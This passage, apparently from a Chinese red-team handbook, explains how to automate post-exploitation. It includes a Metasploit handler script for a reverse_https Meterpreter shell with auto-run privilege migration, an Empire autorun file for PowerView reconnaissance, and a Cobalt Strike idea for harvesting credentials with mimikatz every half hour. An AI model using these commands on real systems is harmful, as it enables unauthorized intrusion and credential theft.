Question

随着基于启发式的终端安全防护机制越来越强大，攻击方式需要快速应变。我们通常可以编写恶意软件规避杀毒软件的检测，即使通过了初次安全防护检测，但是一旦使用类似 mimikatz（在内存中）工具或者横向渗透到另一台主机，就会引发警报。为了解决这个问题，我总是告诉红队在首次尝试攻击时就被发现。在通常情况下，蓝队在发现我们的基本/默认样式（或稍微混淆）的恶意软件时，认为取得胜利，但是首次尝试的真正目的是了解目标的环境。初始静荷自动运行多个侦察脚本，实现上述目的。在下文中，我们将介绍一些快速自动运行的脚本，这些脚本可以帮助我们自动化一些攻击。

8.1.1 使用 RC 脚本自动化 Metasploit

使用 Metasploit，我们可以高效运行后渗透脚本，方法如下。

• 在 Metasploit 中，搜索所有后期渗透利用模块。
• msfconsole。
• show post。

从“post”结果中，选择要使用的所有模块，方便在 Meterpreter Shell 中自动执行。在这种情况下，添加特权迁移后渗透模块（http://bit.ly/2vn1wFB）。配置 Meterpreter Shell，在受感染主机的初始连接中，运行这个静荷，我们需要指定 AutoRunScript 参数。您可以根据需要，添加尽可能多的 AutoRunScript，实现转储有关系统/网络的信息、横向移动等功能。

下面创建处理程序和 AutoRunScript。

• 创建处理程序。
  • gedit handler.rc
• 配置处理程序，运行脚本。
  • use multi/handler
  • set payload windows/meterpreter/reverse_https
  • set LHOST 10.100.100.9
  • set LPORT 443
  • set AutoRunScript post/windows/manage/priv_migrate
  • set ExitOnSession false
  • set EnableStageEncoding true
  • exploit -j
• 运行处理程序。
  • msfconsole -r handler.rc

8.1.2 Empire 自动化

Empire 具有与 Metasploit 资源文件类似的功能，可以自动完成许多重复性任务。首先，我们需要创建一个文件（在示例中，创建一个名为/opt/empire_autoload.rc 的文件），然后在 Empire 实例中加载它。

• 在单独的终端窗口中，创建处理程序文件。
  • gedit /opt/empire_autoload.rc
• 添加您需要执行的后渗透模块。
  • usemodule
    situational_awareness/network/powerview/get_user
  • execute
  • back
  • usermodule
    situational_awareness/network/powerview/get_computer
  • execute
  • back
• 在 Empire 中加载 autoload.rc 资源文件，如图 8.1 所示。
  • agents
  • autorun /opt/empire_autoload.rc powershell
  • autorun show

图 8.1

正如您看到的，当代理回连时，它会自动运行 get_user 和 get_computer PowerShell 脚本。这些脚本的所有结果都存储在 agent.log 文件中。在这种情况下，我们的代理名称为 N6LM348G，因此，日志将存储在/opt/Empire/downloads/N6LM348G/agent.log 中。

8.1.3 Cobalt Strike 自动化

Cobalt Strike 功能强大的主要原因之一是 Aggressor Script。使用 Cobalt Strike 的 Aggressor Script，您不仅可以配置自动运行样式脚本，而且可以创建非常复杂的攻击。

例如，我经常碰到共享工作站的情况，比如实验室或会议室。我可能希望代理程序做的一件事是每隔半小时运行 mimikatz 获取明文凭证。使用 Aggressor Script，我们可以执行这些操作以及其他更多的操作。

8.1.4 自动化的未来

最后，有一些很值得关注的项目正朝着自动化、智能化突破和 APT 攻击的方向发展。我坚信攻击的自动化将成为未来的突破，我们需要能够有这种能力从而测试/验证安全防护机制的效果。我认为在自动化方面具有巨大潜力的两个工具是 Portia 和 Caldera。